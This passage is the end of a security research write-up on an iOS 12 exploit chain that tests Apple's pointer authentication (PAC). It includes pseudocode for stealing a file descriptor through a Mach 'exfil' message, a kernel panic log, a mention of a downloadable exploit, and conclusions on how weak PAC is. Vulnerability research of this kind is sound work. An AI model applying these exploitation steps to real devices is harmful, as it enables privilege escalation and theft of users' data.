//this socket write should go to the correct place for the next call:*socket = ret_wrapper(socket(X,Y,Z))
// need to call fileport_makeport(fd, &port), so need arbitrary x1// can get that via the TINY_RET_WRAPPER*fileport = arbitrary_x1(fileport_makeport, socket, &fileport)
// write the fileport into the exfil messagememory_move(exfil_msg.port_desc.name, fileport)
// send the exfil messagemach_msg_send(exfil_msg)
In the sender we then wait to receive a message on a portset containing the sprayed send rights; if we receive a message before we timeout then we read the fileport from it, extract the fd, and trigger the PF_KEY kernel bug!
panic(cpu 1 caller 0xfffffff0156b8578): "a freed zone element has been modified in zone kalloc.80: expected 0 but found 0x5c539a7c41414141, bits changed 0x5c539a7c41414141, at offset 0 of 80 in element 0xffffffe00394b3e0, cookies 0x3f0011f52a19c140 0x53521b0207bb71b"Debugger message: panicMemory ID: 0xffOS version: 16A366Kernel version: Darwin Kernel Version 18.0.0: Tue Aug 14 22:07:18 PDT 2018; root:xnu-4903.202.2~1\/RELEASE_ARM64_T8020
You can download the exploit targeting iOS 12.0 on iPhone Xs here.ConclusionsIt's rare that mitigations ship with documentation detailing exactly what their purpose is. Is it trying to make a certain exploitation technique less reliable? Is it trying to eradicate a vulnerability class? Is it trying to break an exploit chain?
PAC, as currently implemented, doesn't present much of a barrier for an attacker with local code execution and a memory corruption primitive looking to escalate privileges within userspace. This was also probably not the attack model which PAC in iOS 12 was intended to defend against, but without any documentation from Apple we don't know for sure. It's important to emphasize that the private data which most users want to protect is almost all, at some point, found in userspace.
It's also important to mention that this exploit was very contrived. Firstly, turning the virtual memory logic bug into memory corruption is probably the least interesting thing you could do with it. Finding other logical consequences caused by the unexpected shared memory would be more interesting (maybe a double read of a string used as a selector?) but I just wanted a memory corruption primitive so I could experiment with PAC's resilience to memory corruption in a userspace context and I didn't have any other bugs.
Secondly, gaining PC control is probably also unnecessary. Again, this was done to demonstrate that it's still possible to chain arbitrary function calls together quite easily even with PAC. Stealing resources such as file descriptors or mach ports from remote processes without direct PC control would also be quite possible.
It's hard to call something a PAC defeat without knowing what PAC is supposed to defend against, and it's hard to say that something like PAC "raises the bar" without knowing whether anyone really has to cross that bar anyway.
Kategorie: Hacking & Security